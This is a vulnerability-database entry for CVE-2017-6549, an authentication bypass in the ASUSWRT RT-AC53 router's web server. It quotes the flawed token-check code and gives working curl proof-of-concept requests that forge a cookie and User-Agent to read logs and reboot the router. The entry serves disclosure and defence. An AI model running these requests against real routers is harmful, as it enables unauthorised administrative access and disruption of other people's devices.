ID
VAR-E-201703-0072
CVE
| cve_id: | CVE-2017-6549 | Trust: 1.8 |
| cve_id: | CVE-2017-6547 | Trust: 0.8 |
| cve_id: | CVE-2017-6548 | Trust: 0.3 |
EDB ID
41572
TITLE
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing. CVE-2017-6549 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | asuswrt | model: | rt-ac53 | scope: | eq | version: | (3.0.0.4.380.6038) | Trust: 1.6 |
| vendor: | asus | model: | wrt cross site scripting nmap nse script | scope: | - | version: | - | Trust: 0.5 |
| vendor: | asus | model: | wrt session hijacking nmap nse script | scope: | - | version: | - | Trust: 0.5 |
| vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 3.0.0.4.380.6038 | Trust: 0.3 |
| vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
Session Stealing
Component: httpd
CVE: CVE-2017-6549
Vulnerability:
httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.
asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
asus_token_t *ptr = head;
asus_token_t *tmp = NULL;
int found = 0;
char *cp = NULL;
while(ptr != NULL)
{
if(!strncmp(token, ptr->token, 32)) {
found = 1;
break;
}
else if(strncmp(token, "cgi_logout", 10) == 0) {
cp = strtok(ptr->useragent, "-");
if(strcmp(cp, "asusrouter") != 0) {
found = 1;
break;
}
}
else {
tmp = ptr;
ptr = ptr->next;
}
}
if(found == 1) {
if(prev)
*prev = tmp;
return ptr;
}
else {
return NULL;
}
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.
PoC:
# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt
#reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
It’s possible to execute arbitrary commands on the router if any admin session is currently active.
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Session Stealing
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | xss | Trust: 0.5 |
CREDITS
Bruno Bierbaumer
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6549 | Trust: 1.8 |
| db: | EXPLOIT-DB | id: | 41572 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-6547 | Trust: 0.8 |
| db: | EDBNET | id: | 91799 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 142066 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 142065 | Trust: 0.5 |
| db: | NVD | id: | CVE-2017-6548 | Trust: 0.3 |
| db: | BID | id: | 96938 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6549 | Trust: 1.5 |
| url: | https://bierbaumer.net/security/asuswrt/ | Trust: 1.3 |
| url: | https://www.exploit-db.com/exploits/41572/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6547 | Trust: 0.5 |
| url: | https://www.asus.com/asuswrt/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96938 |
| db: | PACKETSTORM | id: | 142066 |
| db: | PACKETSTORM | id: | 142065 |
| db: | EXPLOIT-DB | id: | 41572 |
| db: | EDBNET | id: | 91799 |
LAST UPDATE DATE
2022-07-27T09:11:32.560000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96938 | date: | 2017-03-23T00:01:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96938 | date: | 2017-03-09T00:00:00 |
| db: | PACKETSTORM | id: | 142066 | date: | 2017-04-07T17:32:22 |
| db: | PACKETSTORM | id: | 142065 | date: | 2017-04-07T13:33:33 |
| db: | EXPLOIT-DB | id: | 41572 | date: | 2017-03-08T00:00:00 |
| db: | EDBNET | id: | 91799 | date: | 2017-03-10T00:00:00 |